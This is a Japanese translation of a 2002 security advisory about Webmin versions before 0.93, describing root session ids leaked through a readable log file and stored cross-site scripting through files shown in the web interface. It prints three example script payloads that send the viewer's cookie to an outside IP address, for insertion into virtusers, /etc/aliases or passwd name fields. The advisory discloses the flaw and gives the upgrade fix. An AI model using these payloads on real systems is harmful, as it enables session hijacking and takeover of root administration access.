Webmin のローカル権限拡大に関する問題 | ScanNetSecurity
2024.05.04(土)

Webmin のローカル権限拡大に関する問題

[翻訳:関谷 麻美]
2002年3月22日

国際 海外情報
[翻訳:関谷 麻美]
2002年3月22日

◆概要:
 Webmin は、UNIX のシステム管理者用 Web ベースのインターフェースだ。テーブルとフォーム(そして File Manager モジュール用の Java) をサポートするブラウザならどれでも、ユーザ・アカウント、Apache、DNS、ファイル共有などを設定できる。その製品に無数のセキュリティ上の脆弱性が発見された。それらの中で危険度の高い脆弱性(権限の拡大を許可する)を以下に挙げる。

◆詳細:
脆弱なシステム:
Webmin 0.93 より以前のバージョン

この問題の影響を受けないシステム:
Webmin バージョン 0.93

問題 #1:
 ( rpm によりインストールされた場合)Webmin のバージョン 0.92-1 は、/var/webmin ディレクトリ上にセキュリティ不備のある権限をそのまま残す。つまり、webmin 内のコマンド・ロギングが有効な場合、ローカル・ユーザは /var/webmin/webmin.log ファイルを読むことができ、そしてルート・ユーザ sid (クッキー・セッション id)を検索できる。そして、その session-id を使用して偽のローカル・クッキーを生成し、ルート権限として直接 webmin に記録することは比較的容易だ。

問題 #2:
 ある程度信用されている同僚がいくつかの Webmin 機能に制限つきアクセス権限(具体的には sendmail )を与えられた場合、悪意あるコードを特定のファイルに挿入することができる。結果、そのルート・ユーザが webmin の関連ページを訪れる際、そのファイルはルートの webmin sid(クッキー・セッション id)を露呈してしまう。

攻略手段の例:
 下記の行を virtusers ファイルに挿入し、ルート権限を持つユーザがそのページを訪れるのを待つ。
</tt></a></td><tt><td><script>/* */document.write('<imgsrc="http://192.168.40.1/'+document.cookie+'">');</script>

 もしくは下記の行を /etc/aliases ファイルに挿入する。
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:*/+zz+' src="http://10.1.1.33/'+document.cookie+'">');</script>
 しかし、webmin の_no_ access を持つ悪意あるローカルユーザはこの脆弱性を利用する危険性があり、そのユーザは webmin が HTML インターフェースを介して見るファイルを変更する恐れがある(但し、HTML インターフェースで読み取られるコードが HTML 用にチェックされない場合)。例えば、下記のようなスクリプトで /etc/passwd にあるそれらの'real name' を変更できるかもしれない。
<script>zz=unescape("%3A");document.write('<img src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>

 (但し、chfn はあなたにこの長さのユーザ名を指定させないが、そのアイディアを得ることができる)

 この問題は、webmin の大部分に存在し、ファイル(もしくは、'ps'のようなコマンド出力)が Web インターフェース内で読み取られ、そして表示される。

◆解決策:
 (いくつかの他の問題と同様に)それらの問題が修正されている Webmin の最新バージョン(0.93) にアップグレードすること。最新版は、下記の URL から入手できる。
http://www.webmin.com/download.html

◆追加情報:
 prophecy.net.nz のアドバイザリーがこの情報が提供した。

[情報提供:SecuriTeam]
http://www.securiteam.com/

《ScanNetSecurity》

PageTop

アクセスランキング

  1. ランサムウェア被害の原因はスターティア社の UTM テストアカウント削除忘れ

    ランサムウェア被害の原因はスターティア社の UTM テストアカウント削除忘れ

  2. クラウド労務管理「WelcomeHR」の個人データ閲覧可能な状態に、契約終了後も個人情報保存

    クラウド労務管理「WelcomeHR」の個人データ閲覧可能な状態に、契約終了後も個人情報保存

  3. 信和へのランサムウェア攻撃で窃取された情報、ロックビット摘発を受けてリークサイトが閉鎖

    信和へのランサムウェア攻撃で窃取された情報、ロックビット摘発を受けてリークサイトが閉鎖

  4. 今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

    今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

  5. 山田製作所にランサムウェア攻撃、「LockBit」が展開され複数のサーバのデータが暗号化

    山田製作所にランサムウェア攻撃、「LockBit」が展開され複数のサーバのデータが暗号化

  6. 「シャドーアクセスとは?」CSAJ が定義と課題をまとめた日本語翻訳資料公開

    「シャドーアクセスとは?」CSAJ が定義と課題をまとめた日本語翻訳資料公開

  7. サイバーセキュリティ版「天国と地獄」~ サプライヤーへサイバー攻撃、身代金支払いを本体へ請求

    サイバーセキュリティ版「天国と地獄」~ サプライヤーへサイバー攻撃、身代金支払いを本体へ請求

  8. 「味市春香なごみオンラインショップ」に不正アクセス、16,407件のカード情報が漏えい

    「味市春香なごみオンラインショップ」に不正アクセス、16,407件のカード情報が漏えい

  9. 「GMOサイバー攻撃 ネットde診断」Palo Alto、Cisco、SonicWall、OpenVPN に対応

    「GMOサイバー攻撃 ネットde診断」Palo Alto、Cisco、SonicWall、OpenVPN に対応

  10. SECON 2024 レポート:最先端のサイバーフィジカルシステムを体感

    SECON 2024 レポート:最先端のサイバーフィジカルシステムを体感

ランキングをもっと見る